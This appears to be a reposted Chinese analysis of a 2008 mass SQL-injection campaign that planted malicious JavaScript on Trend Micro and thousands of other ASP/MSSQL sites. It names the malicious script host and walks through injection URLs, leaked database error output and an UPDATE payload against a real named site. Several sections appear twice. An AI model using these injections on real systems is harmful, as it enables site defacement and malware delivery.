关于趋势科技等网站被攻击的分析
程序员文章站
2022-04-07 08:16:24
一. 首先在网上找到了这次攻击的新闻报道
http://www.nsfocus.net/news/6697
http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html
通过GOOGLE搜索到了相关... 08-10-08...
一. 首先在网上找到了这次攻击的新闻报道
http://www.nsfocus.net/news/6697
http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html
通过google搜索到了相关被黑的页面
http://www.google.cn/search?hl=zh-cn&q=site:trendmicro.com www.2117966.net f**kjp.js&btng=google 鎼滅储&meta=&aq=f
趋势科技的页面被插入过http://www.2117966.net/f**kjp.js相关的js挂马。
二. 直接查找这个js相关的信息 http://www.google.cn/search?complete=1&hl=zh-cn&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了js挂马。 通过分析发现被黑的页面都有如下特征: 1.被修改页面的网站都是asp mssql的架构。 2.被修改的页面都存在sql注入漏洞。
三. 取了其中一个被挂马页面做了sql注入挂马的模拟攻击: 1. http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162 这个链接存在明显的sql注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名shcoordinatorsurame。 http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162 having 1=1 —————————
microsoft ole db provider for odbc drivers error ‘80040e14′
[microsoft][odbc sql server driver][sql server]column ‘coordinator.shcoordinatorsurame’ is invalid in the select list because it is not contained in an aggregate function and there is no group by clause.
/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp, line 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入js的代码来实现挂马 http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162;update coordinator set shcoordinatorsurame=’’ where 1=1–– 修改coordinator 表 shcoordinatorsurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有sql注入点的页面直接挂马。
四.总结. 这次大规模攻击的流程应该是自动化的: 1.通过先进的扫描技术批量收集到几万网站的sql注入漏洞。 2.针对漏洞攻击,进行自动化的sql注入挂马。 现今虽然sql注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
二. 直接查找这个js相关的信息 http://www.google.cn/search?complete=1&hl=zh-cn&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了js挂马。 通过分析发现被黑的页面都有如下特征: 1.被修改页面的网站都是asp mssql的架构。 2.被修改的页面都存在sql注入漏洞。
三. 取了其中一个被挂马页面做了sql注入挂马的模拟攻击: 1. http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162 这个链接存在明显的sql注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名shcoordinatorsurame。 http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162 having 1=1 —————————
microsoft ole db provider for odbc drivers error ‘80040e14′
[microsoft][odbc sql server driver][sql server]column ‘coordinator.shcoordinatorsurame’ is invalid in the select list because it is not contained in an aggregate function and there is no group by clause.
/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp, line 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入js的代码来实现挂马 http://www.wisard.org/wisard/shared/asp/generalpersoninfo/strpersonoverview.asp?person=5162;update coordinator set shcoordinatorsurame=’’ where 1=1–– 修改coordinator 表 shcoordinatorsurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有sql注入点的页面直接挂马。
四.总结. 这次大规模攻击的流程应该是自动化的: 1.通过先进的扫描技术批量收集到几万网站的sql注入漏洞。 2.针对漏洞攻击,进行自动化的sql注入挂马。 现今虽然sql注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
下一篇: 百度搜索重视原创标识该怎么做网站内容?